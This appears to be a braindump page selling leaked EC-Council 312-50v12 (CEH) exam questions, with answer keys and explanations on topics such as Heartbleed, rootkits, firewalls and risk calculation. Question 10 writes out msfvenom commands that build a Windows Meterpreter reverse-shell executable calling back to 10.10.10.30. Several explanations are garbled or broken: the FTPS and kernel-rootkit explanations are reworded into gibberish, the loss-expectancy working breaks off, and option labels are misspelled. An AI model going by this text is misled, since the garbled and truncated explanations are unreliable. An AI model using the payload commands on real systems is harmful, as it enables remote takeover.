312-50v12 | How Many Questions Of 312-50v12 Questions Pool

We provide real 312-50v12 exam questions and answers braindumps in two formats. Download PDF & Practice Tests. Pass EC-Council 312-50v12 Exam quickly & easily. The 312-50v12 PDF type is available for reading and printing. You can print more and practice many times. With the help of our EC-Council 312-50v12 dumps pdf and vce product and material, you can easily pass the 312-50v12 exam.

EC-Council 312-50v12 Free Dumps Questions Online, Read and Test Now.

NEW QUESTION 1
The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE’s Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520.
What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy?

  • A. Public
  • B. Private
  • C. Shared
  • D. Root

Answer: B

NEW QUESTION 2
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker Installed a scanner on a machine belonging to one of the vktims and scanned several machines on the same network to Identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?

  • A. Proxy scanner
  • B. Agent-based scanner
  • C. Network-based scanner
  • D. Cluster scanner

Answer: C

Explanation:
Network-based scanner
A network-based vulnerability scanner, in simplistic terms, is the process of identifying loopholes on a computer’s network or IT assets, which hackers and threat actors can exploit. By implementing this process, one can successfully identify their organization’s current risk(s). This is not where the buck stops; one can also verify the effectiveness of your system's security measures while improving internal and external defenses. Through this review, an organization is well equipped to take an extensive inventory of all systems, including operating systems, installed software, security patches, hardware, firewalls, anti-virus software, and much more.
Agent-based scanner
Agent-based scanners make use of software scanners on each and every device; the results of the scans are reported back to the central server. Such scanners are well equipped to find and report out on a range of vulnerabilities. NOTE: This option is not suitable for us, since for it to work, you need to install a special agent on each computer before you start collecting data from them.

NEW QUESTION 3
If a tester is attempting to ping a target that exists but receives no response or a response that states
the destination is unreachable, ICMP may be disabled and the network may be using TCP. Which
other option could the tester use to get a response from a host using TCP?

  • A. Traceroute
  • B. Hping
  • C. TCP ping
  • D. Broadcast ping

Answer: B

Explanation:
https://tools.kali.org/information-gathering/hping3
http://www.carnal0wnage.com/papers/LSO-Hping2-Basics.pdf

NEW QUESTION 4
Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote location. To manage nodes in the network, he uses MIB. which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mlb or by entering the DNS library name and Lseries.mlb. He is currently retrieving information from an MIB that contains object types for workstations and server services. Which of the following types of MIB is accessed by Garry in the above scenario?

  • A. LNMIB2.MIB
  • B. WINS.MIB
  • C. DHCP.MIS
  • D. MIB_II.MIB

Answer: A

Explanation:
DHCP.MIB: Monitors network traffic between DHCP servers and remote hosts HOSTMIB.MIB: Monitors and manages host resources
LNMIB2.MIB: Contains object types for workstation and server services MIBJI.MIB: Manages TCP/IP-based Internet using a simple architecture and system WINS.MIB: For the Windows Internet Name Service (WINS)

NEW QUESTION 5
Which of the following is a command line packet analyzer similar to GUI-based Wireshark?

  • A. nessus
  • B. tcpdump
  • C. ethereal
  • D. jack the ripper

Answer: B

Explanation:
Tcpdump is a data-network packet analyzer computer program that runs under a command-line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Distributed under the BSD license, tcpdump is free software.
https://www.wireshark.org/
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education.
NOTE: Wireshark is very similar to tcpdump, but has a graphical front-end, plus some integrated sorting and filtering options.

NEW QUESTION 6
Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection. Identify the behavior of the adversary In the above scenario.

  • A. use of command-line interface
  • B. Data staging
  • C. Unspecified proxy activities
  • D. Use of DNS tunneling

Answer: C

Explanation:
A proxy server acts as a gateway between you and therefore the internet. It’s an intermediary server separating end users from the websites they browse. Proxy servers provide varying levels of functionality, security, and privacy counting on your use case, needs, or company policy.
If you’re employing a proxy server, internet traffic flows through the proxy server on its thanks to the address you requested. A proxy server is essentially a computer on the web with its own IP address that your computer knows. once you send an internet request, your request goes to the proxy server first. The proxy server then makes your web request on your behalf, collects the response from the online server, and forwards you the online page data so you’ll see the page in your browser.

NEW QUESTION 7
Which rootkit is characterized by its function of adding code and/or replacing some of the operating-system kernel code to obscure a backdoor on a system?

  • A. User-mode rootkit
  • B. Library-level rootkit
  • C. Kernel-level rootkit
  • D. Hypervisor-level rootkit

Answer: C

NEW QUESTION 8
The change of a hard drive failure is once every three years. The cost to buy a new hard drive is $300. It will require 10 hours to restore the OS and software to the new hard disk. It will require a further 4 hours to restore the database from the last backup to the new hard disk. The recovery person earns $10/hour. Calculate the SLE, ARO, and ALE. Assume the EF = 1(100%). What is the closest approximate cost of this replacement and recovery operation per year?

  • A. $1320
  • B. $440
  • C. $100
  • D. $146

Answer: D

Explanation:
* 1. AV (Asset value)
= $300 + (14 * $10) = $440 - the cost of a hard drive plus the work of a recovery person,
i.e.how much would it take to replace 1 asset? 10 hours for resorting the OS and soft + 4 hours for DB restore multiplies by hourly rate of the recovery person.
* 2. SLE (Single Loss Expectancy)
= AV * EF (Exposure Factor) = $440 * 1 = $440
* 3. ARO (Annual rate of occurrence)
years is 1/3)
* 4. ALE (Annual Loss Expectancy)

NEW QUESTION 9
During a black-box pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?

  • A. Circuit
  • B. Stateful
  • C. Application
  • D. Packet Filtering

Answer: C

Explanation:
https://en.wikipedia.org/wiki/Internet_Relay_Chat
Internet Relay Chat (IRC) is an application layer protocol that facilitates communication in text. The chat process works on a client/server networking model. IRC clients are computer programs that users can install on their system or web-based applications running either locally in the browser or on a third-party server. These clients communicate with chat servers to transfer messages to other clients.
IRC is a plaintext protocol that is officially assigned port 194, according to IANA. However, running the service on this port requires running it with root-level permissions, which is inadvisable. As a result, the well-known port for IRC is 6667, a high-number port that does not require elevated privileges. However, an IRC server can also be configured to run on other ports as well.
You can't tell if an IRC server is designed to be malicious solely based on port number. Still, if you see an IRC server running on port a WKP such as 80, 8080, 53, 443, it's almost always going to be malicious; the only real reason for IRCD to be running on port 80 is to try to evade firewalls.
https://en.wikipedia.org/wiki/Application_firewall
An application firewall is a form of firewall that controls input/output or system calls of an application or service. It operates by monitoring and blocking communications based on a configured policy, generally with predefined rule sets to choose from. The application firewall can control communications up to the OSI model's application layer, which is the highest operating layer, and where it gets its name. The two primary categories of application firewalls are network-based and host-based.
Application layer filtering operates at a higher level than traditional security appliances. This allows packet decisions to be made based on more than just source/destination IP Addresses or ports. It can also use information spanning across multiple connections for any given host.
Network-based application firewalls
Network-based application firewalls operate at the application layer of a TCP/IP stack. They can understand certain applications and protocols such as File Transfer Protocol (FTP), Domain Name System (DNS), or Hypertext Transfer Protocol (HTTP). This allows it to identify unwanted applications or services using a non-standard port or detect if an allowed protocol is being abused.
Host-based application firewalls
A host-based application firewall monitors application system calls or other general system communication. This gives more granularity and control but is limited to only protecting the host it is running on. Control is applied by filtering on a per-process basis. Generally, prompts are used to define rules for processes that have not yet received a connection. Further filtering can be done by examining the process ID of the owner of the data packets. Many host-based application firewalls are combined or used in conjunction with a packet filter.

NEW QUESTION 10
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

  • A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
  • B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
  • C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
  • D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Answer: C

Explanation:
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
Example for Windows:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=Y<our IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

NEW QUESTION 11
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the Information, he successfully performed an attack on the target government organization without being traced. Which of the following techniques is described in the above scenario?

  • A. Dark web footprinting
  • B. VoIP footpnnting
  • C. VPN footprinting
  • D. website footprinting

Answer: A

Explanation:
The deep web is the layer of the online cyberspace that consists of web pages and content that are hidden and unindexed.

NEW QUESTION 12
Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by johnson in the above scenario?

  • A. Host-based assessment
  • B. Wireless network assessment
  • C. Application assessment
  • D. Distributed assessment

Answer: B

Explanation:
Wireless network assessment determines the vulnerabilities in an organization’s wireless networks. In the past, wireless networks used weak and defective data encryption mechanisms. Now, wireless network standards have evolved, but many networks still use weak and outdated security mechanisms and are open to attack. Wireless network assessments try to attack wireless authentication mechanisms and gain unauthorized access. This type of assessment tests wireless networks and identifies rogue networks that may exist within an organization’s perimeter. These assessments audit client-specified sites with a wireless network. They sniff wireless network traffic and try to crack encryption keys. Auditors test other network access if they gain access to the wireless network.

NEW QUESTION 13
In the context of Windows Security, what is a 'null' user?

  • A. A user that has no skills
  • B. An account that has been suspended by the admin
  • C. A pseudo account that has no username and password
  • D. A pseudo account that was created for security administration purpose

Answer: C

NEW QUESTION 14
Bella, a security professional working at an it firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames. and passwords are shared In plaintext, paving the way for hackers 10 perform successful session hijacking. To address this situation. Bella Implemented a protocol that sends data using encryption and digital certificates.
Which of the following protocols Is used by Bella?

  • A. FTP
  • B. HTTPS
  • C. FTPS
  • D. IP

Answer: C

Explanation:
The File Transfer Protocol (FTP) is a standard organization convention utilized for the exchange of PC records from a worker to a customer on a PC organization. FTP is based on a customer worker model engineering utilizing separate control and information associations between the customer and the server.[1] FTP clients may validate themselves with an unmistakable book sign-in convention, ordinarily as a username and secret key, however can interface namelessly if the worker is designed to permit it. For secure transmission that ensures the username and secret phrase, and scrambles the substance, FTP is frequently made sure about with SSL/TLS (FTPS) or supplanted with SSH File Transfer Protocol (SFTP).
The primary FTP customer applications were order line programs created prior to working frameworks had graphical UIs, are as yet dispatched with most Windows, Unix, and Linux working systems.[2][3] Many FTP customers and mechanization utilities have since been created for working areas, workers, cell phones, and equipment, and FTP has been fused into profitability applications, for example, HTML editors.

NEW QUESTION 15
To invisibly maintain access to a machine, an attacker utilizes a toolkit that sits undetected In the core components of the operating system. What is this type of rootkit an example of?

  • A. Mypervisor rootkit
  • B. Kernel toolkit
  • C. Hardware rootkit
  • D. Firmware rootkit

Answer: B

Explanation:
Kernel-mode rootkits run with the best operating system privileges (Ring 0) by adding code or replacement parts of the core operating system, as well as each the kernel and associated device drivers. Most operative systems support kernel-mode device drivers, that execute with a similar privileges because the software itself. As such, several kernel-mode rootkits square measure developed as device drivers or loadable modules, like loadable kernel modules in Linux or device drivers in Microsoft Windows. This category of rootkit has unrestricted security access, however is tougher to jot down. The quality makes bugs common, and any bugs in code operative at the kernel level could seriously impact system stability, resulting in discovery of the rootkit. one amongst the primary wide familiar kernel rootkits was developed for Windows NT four.0 and discharged in Phrack magazine in 1999 by Greg Hoglund. Kernel rootkits is particularly tough to observe and take away as a result of they operate at a similar security level because the software itself, and square measure therefore able to intercept or subvert the foremost sure software operations. Any package, like antivirus package, running on the compromised system is equally vulnerable. during this scenario, no a part of the system is sure.

NEW QUESTION 16
......

Recommend!! Get the Full 312-50v12 dumps in VCE and PDF From 2passeasy, Welcome to Download: https://www.2passeasy.com/dumps/312-50v12/ (New 503 Q&As Version)